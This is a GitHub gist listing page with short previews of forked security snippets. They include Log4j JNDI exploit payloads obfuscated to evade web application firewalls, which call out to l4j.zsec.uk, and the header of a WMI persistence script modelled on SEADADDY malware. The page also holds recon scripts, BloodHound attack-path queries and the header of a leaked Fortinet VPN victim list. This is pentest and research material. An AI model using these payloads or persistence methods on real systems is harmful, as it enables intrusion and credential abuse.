Alexander Knorr opexxx
opexxx
/ vhd2raw.cmd
Created
April 30, 2015 12:45
— forked from mwchambers/gist:1319382
convert VHD file to RAW Image
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| qemu-img convert -O raw source.vhd output.raw |
opexxx
/ WMIPersistence.vbs
Created
September 22, 2020 11:17
— forked from mgeeky/WMIPersistence.vbs
Visual Basic Script implementing WMI Persistence method (as implemented in SEADADDY malware and further documented by Matt Graeber) to make the Macro code schedule malware startup after roughly 3 minutes since system gets up.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' | |
| ' SYNOPSIS: | |
| ' WMI Persistence method as originally presented by SEADADDY malware | |
| ' (https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887) | |
| ' and further documented by Matt Graeber. | |
| ' | |
| ' The scheduled command will be launched after roughly 3 minutes since system | |
| ' gets up. Also, even if the command shall spawn a window - it will not be visible, | |
| ' since the command will get invoked by WmiPrvSE.exe that's running in Session 0. | |
| ' |
opexxx
/ Log4j Payloads
Created
December 13, 2021 01:25
— forked from ZephrFish/Log4j Payloads
Collection of WAF evasion payloads
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ${jndi:ldap://127.0.0.1:1389/ badClassName} | |
| ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://l4j.zsec.uk/sploit} | |
| ${${::-j}ndi:rmi://l4j.zsec.uk/sploit} | |
| ${jndi:rmi://l4j.zsec.uk} | |
| ${${lower:jndi}:${lower:rmi}://l4j.zsec.uk/sploit} | |
| ${${lower:${lower:jndi}}:${lower:rmi}://l4j.zsec.uk/sploit} | |
| ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://l4j.zsec.uk/sploit} | |
| ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://l4j.zsec.uk/sploit} | |
| ${${upper:jndi}:${upper:rmi}://l4j.zsec.uk/sploit} | |
| ${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://l4j.zsec.uk/sploit} |
opexxx
/ amass_config.ini
Created
September 17, 2021 09:12
— forked from khanjanny/amass_config.ini
amass_config.ini
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| share = true | |
| #mode = passive | |
| mode = active | |
| #output_directory = amass | |
| scripts_directory = /home/khan/scripts | |
| maximum_dns_queries = 10000 | |
| [resolvers] |
opexxx
/ fortinet_victim_list_with_country_codes_2021.txt
Created
September 9, 2021 03:20
— forked from crypto-cypher/fortinet_victim_list_with_country_codes_2021.txt
Fortinet Victim List - Sorted By Country #TrackThePlanet
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ##### COURTESY OF LOVELY INTELLIGENCE RESEARCHERS | |
| # @CuratedIntel | |
| # https://curatedintel.org | |
| ##### BACKGROUND | |
| # Initally shared on RAMP ransomware forum | |
| # Last shared on Groove ransomware extortion website | |
| # Publicized by Bleeping Computer, which lead to this post being issued to help blue teamers | |
| # https://www.bleepingcomputer.com/news/security/hackers-leak-passwords-for-500-000-fortinet-vpn-accounts/ |
opexxx
/ Web-App-Pentest.sh
Created
September 7, 2021 19:17
— forked from MShahine/Web-App-Pentest.sh
List Of Tools For Hackers And Pentesters . I Turn It To Bash Script So You Need [ git ] To Download All Of them . And Then Go To Eatch Folder And See What Can You Do To MAke It Work.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Web Application Pentest | |
| clear | |
| echo "[!] Don't Run It As Root Never [!]" | |
| sleep 2 | |
| mkdir ~/Tools/Web-Application-Pentest | |
| cd ~/Tools/Web-Application-Pentest | |
| # --------------------------------- # | |
| mkdir ~/Tools/Web-Application-Pentest/Domain-Finding-Enum | |
| mkdir ~/Tools/Web-Application-Pentest/General-Recon |
opexxx
/ amass.sh
Created
September 7, 2021 18:43
— forked from LuD1161/amass.sh
Scripts for different tools are here, run setup_bbty.sh to copy these in the scripts folder
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| domain=$1 | |
| resultDir=$2 | |
| resultfile=$resultDir/$domain.amass.txt | |
| touch $resultfile | |
| echo "" >> $resultDir/log.txt | |
| echo "AMASS Logs Now" >> $resultDir/log.txt | |
| echo "" >> $resultDir/log.txt |
opexxx
/ subenum_beta.sh
Created
September 7, 2021 17:52
— forked from bing0o/subenum_beta.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # script for subdomain enumeration using 4 of the best tools with some APIs: | |
| # * findomain: https://github.com/Edu4rdSHL/findomain | |
| # * SubFinder: https://github.com/projectdiscovery/subfinder | |
| # * Amass: https://github.com/OWASP/Amass | |
| # * AssetFinder: https://github.com/tomnomnom/assetfinder | |
| # | |
| # a perl version is being developed by @terminalforlife | |
| # * https://github.com/terminalforlife/PerlProjects/tree/master/source/dominator |
opexxx
/ shrinkpdf.sh
Created
August 26, 2021 13:54
— forked from danmackinlay/shrinkpdf.sh
reduce PDF file size by optimising it for screen viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # copied from http://www.tatome.de/bliki/doku.php?id=projects:shrinkpdf | |
| if [ $# -lt 2 ] || [ $# -gt 3 ]; then | |
| echo usage: shrinkpdf \<filename\> \<resolution\> \[\<output\>\] | |
| exit | |
| fi | |
| if [ ! -e "$1" ]; then | |
| echo "$1" does not exist. Exiting. |
opexxx
/ gist:cf22e086aa078c3a2bfe3601f06b1e6d
Created
February 24, 2021 20:49
— forked from jeffmcjunkin/gist:7b4a67bb7dd0cfbfbd83768f3aa6eb12
Useful Cypher queries for BloodHound
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| MATCH (u:User)-[r:AdminTo|MemberOf*1..]->(c:Computer | |
| RETURN u.name | |
| That’ll return a list of users who have admin rights on at least one system either explicitly or through group membership | |
| --------------- | |
| MATCH | |
| (U:User)-[r:MemberOf|:AdminTo*1..]->(C:Computer) | |
| WITH | |
| U.name as n, |
NewerOlder